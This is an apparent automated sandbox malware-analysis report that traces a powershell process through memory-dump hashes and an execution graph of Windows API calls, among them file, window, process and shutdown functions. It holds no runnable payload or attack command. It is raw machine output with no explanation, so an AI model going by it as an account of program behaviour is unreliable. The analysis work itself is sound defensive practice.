                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 132034935-0

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2034013084.00007FFEB7740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7740000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7740000_powershell.jbxd

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2034013084.00007FFEB7740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7740000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7740000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2027108572.00007FFEB7410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7410000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7410000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2036351067.00007FFEB7870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7870000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2027108572.00007FFEB7410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7410000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7410000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6d3a51621bf69b9252a8a7112f677ac716043452d803d60085256e440f3c9980
                                                                                                                                                                • Instruction ID: de6d8809b9649dc9af558c59fabde4eb852b6e5bd6e856fcd0d35791a47255f5
                                                                                                                                                                • Opcode Fuzzy Hash: 6d3a51621bf69b9252a8a7112f677ac716043452d803d60085256e440f3c9980
                                                                                                                                                                • Instruction Fuzzy Hash: FF913170A1C6885FD349EB7C406527ABBD1EFCD215F548ABE908EC76B3DE3998028305
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5d9fedb2b806451dce7a0e7fa568c42236ea1b4ab1368ccabc3321b3dca7431f
                                                                                                                                                                • Instruction ID: 70454ccb6b70f5b0ea0fda12781f3de84c2b0b14930c7e4c371cb210a1ddc477
                                                                                                                                                                • Opcode Fuzzy Hash: 5d9fedb2b806451dce7a0e7fa568c42236ea1b4ab1368ccabc3321b3dca7431f
                                                                                                                                                                • Instruction Fuzzy Hash: 5F918B30A2CA498FD758EB3C8415269B3E2EF89205F544ABDD14EC7AB3DE3998528741
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "[%$^^'1$^^6)$^^>!$^^i
                                                                                                                                                                • API String ID: 0-2909005086
                                                                                                                                                                • Opcode ID: 027434a31d833dca80bedcadc21c14b71680cda84b9ca3ba7c9551a80a3f7093
                                                                                                                                                                • Instruction ID: 3b9c80d204aa6f390c05e071d01d5e7d40398c93c54724d39fb65148227298d8
                                                                                                                                                                • Opcode Fuzzy Hash: 027434a31d833dca80bedcadc21c14b71680cda84b9ca3ba7c9551a80a3f7093
                                                                                                                                                                • Instruction Fuzzy Hash: 9E414A23E0A6236ADA11BF7CB14A1DDFF91EF00775B104077E7888A053ED286096A3C5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "[%$^^6)$^^>!$^^i
                                                                                                                                                                • API String ID: 0-147050912
                                                                                                                                                                • Opcode ID: 6cd4f7cf45751e1162e895e59ecc6e1926a4dbe1254189d9c5536ce99a0c16c6
                                                                                                                                                                • Instruction ID: 0dd40ad29a8237a7673d26791da5265459eb6d16dc525aced184fb0550e78a94
                                                                                                                                                                • Opcode Fuzzy Hash: 6cd4f7cf45751e1162e895e59ecc6e1926a4dbe1254189d9c5536ce99a0c16c6
                                                                                                                                                                • Instruction Fuzzy Hash: B0414B23E0A62366DE11BF7CF5461E9FB91EF00376B104077E7888A052ED2960D6A3C5

Execution Graph

Execution Coverage: 5.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 18.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 91
66293->66295 66335 1116d7aa 66 API calls 3 library calls 66293->66335 66294 11170502 66344 11170515 LeaveCriticalSection _doexit 66294->66344 66295->66271 66298->66267 66314 1116b5fa TlsGetValue 66299->66314 66302 1116b7a9 SetLastError 66302->66280 66305 1116b76f DecodePointer 66306 1116b784 66305->66306 66307 1116b7a0 66306->66307 66308 1116b788 66306->66308 66310 11162be5 _free 62 API calls 66307->66310 66323 1116b688 66 API calls 4 library calls 66308->66323 66312 1116b7a6 66310->66312 66311 1116b790 GetCurrentThreadId 66311->66302 66312->66302 66315 1116b60f DecodePointer TlsSetValue 66314->66315 66316 1116b62a 66314->66316 66315->66316 66316->66302 66317 11169dbe 66316->66317 66320 11169dc7 66317->66320 66319 11169e04 66319->66302 66319->66305 66320->66319 66321 11169de5 Sleep 66320->66321 66324 11170166 66320->66324 66322 11169dfa 66321->66322 66322->66319 66322->66320 66323->66311 66325 11170172 66324->66325 66326 1117018d 66324->66326 66325->66326 66327 1117017e 66325->66327 66329 111701a0 RtlAllocateHeap 66326->66329 66331 111701c7 66326->66331 66334 1116d4a8 DecodePointer 66326->66334 66333 111692ef 66 API calls __getptd_noexit 66327->66333 66329->66326 66329->66331 66330 11170183 66330->66320 66331->66320 66333->66330 66334->66326 66337 11173764 EnterCriticalSection 66336->66337 66338 11173751 66336->66338 66337->66291 66345 1117367a 66338->66345 66340 11173757 66340->66337 66372 1116d7aa 66 API calls 3 library calls 66340->66372 66343->66294 66344->66293 66346 11173686 _raise 66345->66346 66347 11173696 66346->66347 66348 111736ae 66346->66348 66373 1116d99d 66 API calls __NMSG_WRITE 66347->66373 66354 111736bc _raise 66348->66354 66376 11169d79 66348->66376 66350 1117369b 66374 1116d7ee 66 API calls 6 library calls 66350->66374 66354->66340 66355 111736a2 66375 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 66355->66375 66356 111736ce 66382 111692ef 66 API calls __getptd_noexit 66356->66382 66357 111736dd 66360 1117373c 
__lock 65 API calls 66357->66360 66361 111736e4 66360->66361 66363 11173717 66361->66363 66364 111736ec InitializeCriticalSectionAndSpinCount 66361->66364 66367 11162be5 _free 65 API calls 66363->66367 66365 11173708 66364->66365 66366 111736fc 66364->66366 66384 11173733 LeaveCriticalSection _doexit 66365->66384 66368 11162be5 _free 65 API calls 66366->66368 66367->66365 66369 11173702 66368->66369 66383 111692ef 66 API calls __getptd_noexit 66369->66383 66373->66350 66374->66355 66378 11169d82 66376->66378 66377 11162b51 _malloc 65 API calls 66377->66378 66378->66377 66379 11169db8 66378->66379 66380 11169d99 Sleep 66378->66380 66379->66356 66379->66357 66381 11169dae 66380->66381 66381->66378 66381->66379 66382->66354 66383->66365 66384->66354 66385->66239 66386->66242 66387->66247 66388->65734 66389 11115b70 66407 11145320 66389->66407 66392 11115bb5 66393 11115bc4 CoInitialize CoCreateInstance 66392->66393 66394 11115b98 66392->66394 66395 11115bf4 LoadLibraryA 66393->66395 66406 11115be9 66393->66406 66396 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66394->66396 66398 11115c10 GetProcAddress 66395->66398 66395->66406 66399 11115ba6 66396->66399 66397 111450a0 std::locale::_Init 90 API calls 66397->66392 66400 11115c20 SHGetSettings 66398->66400 66401 11115c34 FreeLibrary 66398->66401 66400->66401 66401->66406 66402 11115cd1 CoUninitialize 66403 11115cd7 66402->66403 66404 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66403->66404 66405 11115ce6 66404->66405 66406->66402 66406->66403 66408 111450a0 std::locale::_Init 90 API calls 66407->66408 66409 11115b8e 66408->66409 66409->66392 66409->66394 66409->66397 66410 11025d00 66411 11025d0e GetProcAddress 66410->66411 66412 11025d1f 66410->66412 66411->66412 66413 11025d38 66412->66413 66414 11025d2c K32GetProcessImageFileNameA 66412->66414 66416 11025d3e GetProcAddress 66413->66416 
66417 11025d4f 66413->66417 66414->66413 66415 11025d71 66414->66415 66416->66417 66418 11025d56 66417->66418 66419 11025d67 SetLastError 66417->66419 66419->66415 66420 11173a35 66421 1116b7b5 __getptd 66 API calls 66420->66421 66422 11173a52 _LcidFromHexString 66421->66422 66423 11173a5f GetLocaleInfoA 66422->66423 66424 11173a86 66423->66424 66425 11173a92 66423->66425 66428 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66424->66428 66443 111646ce 85 API calls 2 library calls 66425->66443 66427 11173a9e 66430 11173aa8 GetLocaleInfoA 66427->66430 66436 11173ad8 _CountryEnumProc@4 _strlen 66427->66436 66429 11173c02 66428->66429 66430->66424 66431 11173ac7 66430->66431 66444 111646ce 85 API calls 2 library calls 66431->66444 66432 11173b4b GetLocaleInfoA 66432->66424 66434 11173b6e 66432->66434 66446 111646ce 85 API calls 2 library calls 66434->66446 66436->66424 66436->66432 66437 11173ad2 66437->66436 66445 11163784 85 API calls 2 library calls 66437->66445 66438 11173b79 66438->66424 66441 11173b81 _strlen 66438->66441 66447 111646ce 85 API calls 2 library calls 66438->66447 66441->66424 66448 111739da GetLocaleInfoW _GetPrimaryLen _strlen 66441->66448 66443->66427 66444->66437 66445->66436 66446->66438 66447->66441 66448->66424 66449 1102e640 66450 1102e683 66449->66450 66451 1110f420 std::locale::_Init 266 API calls 66450->66451 66452 1102e68a 66451->66452 66454 1102e6aa 66452->66454 67512 11142a60 66452->67512 66846 11142bb0 66454->66846 66457 1102e701 66460 11142bb0 86 API calls 66457->66460 66459 1102e6e6 66461 11081bb0 86 API calls 66459->66461 66462 1102e72a 66460->66462 66461->66457 66463 11162de7 std::locale::_Init 79 API calls 66462->66463 66467 1102e737 66462->66467 66463->66467 66464 1102e766 66465 1102e7e5 CreateEventA 66464->66465 66466 1102e7bf GetSystemMetrics 66464->66466 66473 1102e805 66465->66473 66474 1102e819 66465->66474 66466->66465 66468 1102e7ce 66466->66468 66467->66464 
66469 111450a0 std::locale::_Init 90 API calls 66467->66469 66470 11146450 std::locale::_Init 21 API calls 66468->66470 66469->66464 66472 1102e7d8 66470->66472 67530 1102d330 66472->67530 67667 11029450 266 API calls 2 library calls 66473->67667 66476 1110f420 std::locale::_Init 266 API calls 66474->66476 66478 1102e820 66476->66478 66479 1102e840 66478->66479 66480 111100d0 425 API calls 66478->66480 66481 1110f420 std::locale::_Init 266 API calls 66479->66481 66480->66479 66482 1102e854 66481->66482 66483 111100d0 425 API calls 66482->66483 66484 1102e874 66482->66484 66483->66484 66485 1110f420 std::locale::_Init 266 API calls 66484->66485 66486 1102e8f3 66485->66486 66487 1102e923 66486->66487 67668 11060f70 298 API calls std::locale::_Init 66486->67668 66489 1110f420 std::locale::_Init 266 API calls 66487->66489 66490 1102e93d 66489->66490 66491 1102e962 FindWindowA 66490->66491 67669 11060be0 290 API calls std::locale::_Init 66490->67669 66494 1102eab7 66491->66494 66495 1102e99b 66491->66495 66852 110613d0 66494->66852 66495->66494 66498 1102e9b3 GetWindowThreadProcessId 66495->66498 66500 11146450 std::locale::_Init 21 API calls 66498->66500 66499 110613d0 269 API calls 66501 1102ead5 66499->66501 66502 1102e9d9 OpenProcess 66500->66502 66503 110613d0 269 API calls 66501->66503 66502->66494 66505 1102e9f9 66502->66505 66504 1102eae1 66503->66504 66506 1102eaf8 66504->66506 66507 1102eaef 66504->66507 67670 11094b30 105 API calls 66505->67670 66859 11145910 66506->66859 67671 11027d60 119 API calls 2 library calls 66507->67671 66510 1102ea18 66513 11146450 std::locale::_Init 21 API calls 66510->66513 66511 1102eaf4 66511->66506 66515 1102ea2c 66513->66515 66514 1102eb07 66874 11144dc0 ExpandEnvironmentStringsA 66514->66874 66516 1102ea6b CloseHandle FindWindowA 66515->66516 66517 11146450 std::locale::_Init 21 API calls 66515->66517 66518 1102ea93 GetWindowThreadProcessId 66516->66518 66519 1102eaa7 66516->66519 66521 1102ea3e SendMessageA 
WaitForSingleObject 66517->66521 66518->66519 66522 11146450 std::locale::_Init 21 API calls 66519->66522 66521->66516 66524 1102ea5e 66521->66524 66525 1102eab4 66522->66525 66527 11146450 std::locale::_Init 21 API calls 66524->66527 66525->66494 66529 1102ea68 66527->66529 66528 1102eb2a 66530 1102ec01 66528->66530 66898 11062d60 66528->66898 66529->66516 66913 110274c0 66530->66913 67731 11142ac0 66846->67731 66848 11165797 85 API calls std::locale::_Init 66850 11142bc5 66848->66850 66849 11142ac0 IsDBCSLeadByte 66849->66850 66850->66848 66850->66849 66851 1102e6d4 66850->66851 66851->66457 67520 11081bb0 66851->67520 66853 11061446 66852->66853 66854 110613f7 66852->66854 66855 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66853->66855 66854->66853 66858 11081bb0 86 API calls 66854->66858 67743 110612f0 269 API calls 4 library calls 66854->67743 66857 1102eac9 66855->66857 66857->66499 66858->66854 67744 11144bd0 66859->67744 66862 11144bd0 std::locale::_Init 266 API calls 66863 11145947 wsprintfA 66862->66863 66864 11143230 std::locale::_Init 8 API calls 66863->66864 66866 11145964 66864->66866 66865 11145990 66868 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66865->66868 66866->66865 66867 11143230 std::locale::_Init 8 API calls 66866->66867 66869 11145979 66867->66869 66870 1114599c 66868->66870 66869->66865 66871 11145980 66869->66871 66870->66514 66872 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66871->66872 66873 1114598c 66872->66873 66873->66514 66875 11144df7 66874->66875 66876 11144e14 std::locale::_Init 66875->66876 66877 11144e2e 66875->66877 66885 11144e04 66875->66885 66880 11144e25 GetModuleFileNameA 66876->66880 66878 11144bd0 std::locale::_Init 266 API calls 66877->66878 66881 11144e34 66878->66881 66879 11142290 std::locale::_Init 266 API calls 66882 
11144e88 66879->66882 66880->66881 66883 11081b40 std::locale::_Init IsDBCSLeadByte 66881->66883 66884 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66882->66884 66883->66885 66886 1102eb18 66884->66886 66885->66879 66887 11143230 66886->66887 66888 11143251 CreateFileA 66887->66888 66890 111432ee CloseHandle 66888->66890 66891 111432ce 66888->66891 66894 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66890->66894 66892 111432d2 CreateFileA 66891->66892 66893 1114330b 66891->66893 66892->66890 66892->66893 66896 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66893->66896 66895 11143307 66894->66895 66895->66528 66897 1114331a 66896->66897 66897->66528 66899 1105dd10 79 API calls 66898->66899 66900 11062d88 66899->66900 67793 11061c90 66900->67793 68519 11060f40 66913->68519 67513 11142aa8 67512->67513 67516 11142a6e 67512->67516 67514 11142290 std::locale::_Init 266 API calls 67513->67514 67515 11142ab0 67514->67515 67515->66454 67516->67513 67517 11142a92 67516->67517 69600 11142310 268 API calls std::locale::_Init 67517->69600 67519 11142a98 67519->66454 67521 11081bbd 67520->67521 67522 11081bc2 67520->67522 69601 11081990 IsDBCSLeadByte 67521->69601 67524 11081bcb 67522->67524 67529 11081bdf 67522->67529 69602 111646ce 85 API calls 2 library calls 67524->69602 67526 11081bd8 67526->66459 67527 11081c43 67527->66459 67528 11165797 85 API calls std::locale::_Init 67528->67529 67529->67527 67529->67528 67531 11146450 std::locale::_Init 21 API calls 67530->67531 67532 1102d36c 67531->67532 67533 11145320 std::locale::_Init 90 API calls 67532->67533 67534 1102d374 67533->67534 67535 1102d3a9 GetCurrentProcess SetPriorityClass 67534->67535 67536 1102d37d InterlockedIncrement 67534->67536 67539 1102d3dd 67535->67539 67536->67535 67537 1102d38c 67536->67537 67538 11146450 
std::locale::_Init 21 API calls 67537->67538 67541 1102d396 67538->67541 67540 1102d3e6 SetEvent 67539->67540 67544 1102d3ed 67539->67544 67540->67544 67543 1102d3a0 Sleep 67541->67543 67542 1102d424 67548 1102d452 67542->67548 69622 1109f1d0 274 API calls std::locale::_Init 67542->69622 67543->67543 67544->67542 69620 11029370 278 API calls 2 library calls 67544->69620 67547 1102d40d 69621 110ff6c0 277 API calls 2 library calls 67547->69621 69603 11028090 SetEvent 67548->69603 67551 1102d468 67552 1102d47d 67551->67552 69623 110ec980 457 API calls 67551->69623 67554 1102d49f 67552->67554 69624 110594a0 SetEvent 67552->69624 67556 1102d4de 67554->67556 67557 1102d4b3 Sleep 67554->67557 67558 11146450 std::locale::_Init 21 API calls 67556->67558 67557->67556 67559 1102d4e8 67558->67559 67560 1102d518 67559->67560 67562 1105dd10 79 API calls 67559->67562 67563 1102d58a 67560->67563 67564 1102d53f 67560->67564 67562->67560 69627 11026f20 6 API calls std::ios_base::_Tidy 67563->69627 69604 110affa0 67564->69604 67567 1102d590 67571 1102d5af PostThreadMessageA 67567->67571 67576 1102d5cb 67567->67576 69628 1110f3a0 WaitForSingleObject 67571->69628 67572 1102d5f7 std::ios_base::_Tidy 67581 11146450 std::locale::_Init 21 API calls 67572->67581 67596 1102d62d 67572->67596 67573 1102d5f0 69630 11059400 DeleteCriticalSection CloseHandle 67573->69630 67576->67572 67576->67573 69629 1110f3a0 WaitForSingleObject 67576->69629 67577 1102d56a 67583 1102d57d 67577->67583 69626 111352b0 300 API calls 5 library calls 67577->69626 67578 1102d66b 67580 1102d681 67578->67580 67586 11075d10 403 API calls 67578->67586 67587 11146450 std::locale::_Init 21 API calls 67580->67587 67581->67596 69650 1100d4e0 FreeLibrary 67583->69650 67586->67580 67591 1102d68b 67587->67591 67589 1102d661 69632 11107b50 653 API calls std::locale::_Init 67589->69632 67595 1113cc30 302 API calls 67591->67595 67592 1102d666 69633 11105ac0 348 API calls std::locale::_Init 67592->69633 67593 1102d8a0 67603 1102d8c7 
GetModuleFileNameA GetFileAttributesA 67593->67603 67616 1102d9fa 67593->67616 67594 1102d889 67594->67593 69651 1100d200 wsprintfA 67594->69651 67599 1102d690 67595->67599 67596->67578 69631 11105420 26 API calls std::locale::_Init 67596->69631 67601 11146450 std::locale::_Init 21 API calls 67599->67601 67600 1102d895 67602 11146450 std::locale::_Init 21 API calls 67600->67602 67604 1102d69a 67601->67604 67602->67593 67606 1102d8ef 67603->67606 67603->67616 67614 1102d6ae std::ios_base::_Tidy 67604->67614 69634 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 67604->69634 67605 11146450 std::locale::_Init 21 API calls 67607 1102da92 67605->67607 67609 1110f420 std::locale::_Init 266 API calls 67606->67609 69654 11146410 FreeLibrary 67607->69654 67608 11146450 std::locale::_Init 21 API calls 67612 1102d6c1 67608->67612 67613 1102d8f6 67609->67613 67622 1102d6d5 std::ios_base::_Tidy 67612->67622 69635 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 67612->69635 67619 11142a60 268 API calls 67613->67619 67626 1102d918 67613->67626 67614->67608 67615 1102da9a 67617 1102dad6 67615->67617 67620 1102dac4 ExitWindowsEx 67615->67620 67621 1102dab4 ExitWindowsEx Sleep 67615->67621 67616->67605 67623 1102dae6 67617->67623 67624 1102dadb Sleep 67617->67624 67619->67626 67620->67617 67621->67620 67625 1102d74f 67622->67625 69636 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67622->69636 67628 11146450 std::locale::_Init 21 API calls 67623->67628 67624->67623 67634 1102d760 std::ios_base::_Tidy 67625->67634 69638 1110fc70 279 API calls 2 library calls 67625->69638 67631 11142bb0 86 API calls 67626->67631 67633 1102daf0 ExitProcess 67628->67633 67636 1102d93d 67631->67636 67658 1102d7d9 std::ios_base::_Tidy 67634->67658 69639 1110fc70 279 API calls 2 library calls 67634->69639 67635 11146450 std::locale::_Init 21 API calls 67637 1102d7ec 67635->67637 67638 1102d9e3 67636->67638 67640 11081b40 
std::locale::_Init IsDBCSLeadByte 67636->67640 67639 1102d809 CloseHandle 67637->67639 69640 1108a570 67637->69640 67638->67616 67644 1102d824 67639->67644 67645 1102d82a 67639->67645 67643 1102d953 67640->67643 67641 11146450 std::locale::_Init 21 API calls 67657 1102d6ff std::ios_base::_Tidy 67641->67657 67647 1102d96e _memset 67643->67647 69652 11029450 266 API calls 2 library calls 67643->69652 67648 11162be5 _free 66 API calls 67644->67648 67666 1102d869 std::ios_base::_Tidy 67645->67666 69647 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67645->69647 67646 1102d800 std::ios_base::_Tidy 67646->67639 67651 1102d988 FindFirstFileA 67647->67651 67648->67645 67654 1102d9d4 67651->67654 67655 1102d9a8 FindNextFileA 67651->67655 67652 1102d858 67652->67666 69649 1110fc70 279 API calls 2 library calls 67652->69649 69653 111266e0 292 API calls 5 library calls 67654->69653 67664 1102d9c8 FindClose 67655->67664 67656 11162be5 _free 66 API calls 67660 1102d83c 67656->67660 67657->67625 67657->67641 69637 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67657->69637 67658->67635 67660->67652 67660->67656 69648 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67660->69648 67664->67654 67666->67583 67668->66487 67669->66491 67670->66510 67671->66511 67732 11142ad6 67731->67732 67733 11142b93 67732->67733 67738 11081a70 67732->67738 67733->66850 67735 11142afb 67736 11081a70 IsDBCSLeadByte 67735->67736 67737 11142b2b _memmove 67736->67737 67737->66850 67739 11081a7c 67738->67739 67741 11081a81 __mbschr_l std::locale::_Init 67738->67741 67742 11081990 IsDBCSLeadByte 67739->67742 67741->67735 67742->67741 67743->66854 67745 11144bf2 67744->67745 67749 11144c09 std::locale::_Init 67744->67749 67790 11029450 266 API calls 2 library calls 67745->67790 67748 11144d97 67750 11161d01 
__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 67748->67750 67749->67748 67751 11144c3c GetModuleFileNameA 67749->67751 67752 11144db3 wsprintfA 67750->67752 67768 11081b40 67751->67768 67752->66862 67754 11144c51 67755 11144c61 SHGetFolderPathA 67754->67755 67756 11144d48 67754->67756 67757 11144c8e 67755->67757 67758 11144cad SHGetFolderPathA 67755->67758 67759 11142290 std::locale::_Init 263 API calls 67756->67759 67757->67758 67761 11144c94 67757->67761 67762 11144ce2 67758->67762 67759->67748 67791 11029450 266 API calls 2 library calls 67761->67791 67764 1102a620 std::locale::_Init 145 API calls 67762->67764 67766 11144cf3 67764->67766 67772 11144670 67766->67772 67769 11081b53 _strrchr 67768->67769 67771 11081b6a std::locale::_Init 67769->67771 67792 11081990 IsDBCSLeadByte 67769->67792 67771->67754 67773 111446fa 67772->67773 67774 1114467b 67772->67774 67773->67756 67774->67773 67775 1114468b GetFileAttributesA 67774->67775 67776 111446a5 67775->67776 67777 11144697 67775->67777 67778 11163cf8 __strdup 66 API calls 67776->67778 67777->67756 67779 111446ac 67778->67779 67780 11081b40 std::locale::_Init IsDBCSLeadByte 67779->67780 67781 111446b6 67780->67781 67782 11144670 std::locale::_Init 67 API calls 67781->67782 67788 111446d3 67781->67788 67783 111446c6 67782->67783 67784 111446dc 67783->67784 67785 111446ce 67783->67785 67787 11162be5 _free 66 API calls 67784->67787 67786 11162be5 _free 66 API calls 67785->67786 67786->67788 67789 111446e1 CreateDirectoryA 67787->67789 67788->67756 67789->67788 67792->67771 67913 11144ea0 67793->67913 67795 11061d1c 67796 110d1550 269 API calls 67795->67796 67797 11061d30 67796->67797 67798 11061f17 67797->67798 67799 11061d44 std::ios_base::_Tidy 67797->67799 67922 1116449d 67797->67922 67803 1116449d _fgets 81 API calls 67798->67803 67800 11062c88 67799->67800 67802 11163db7 std::locale::_Init 102 API calls 67799->67802 67804 110d07c0 266 API calls 67800->67804 
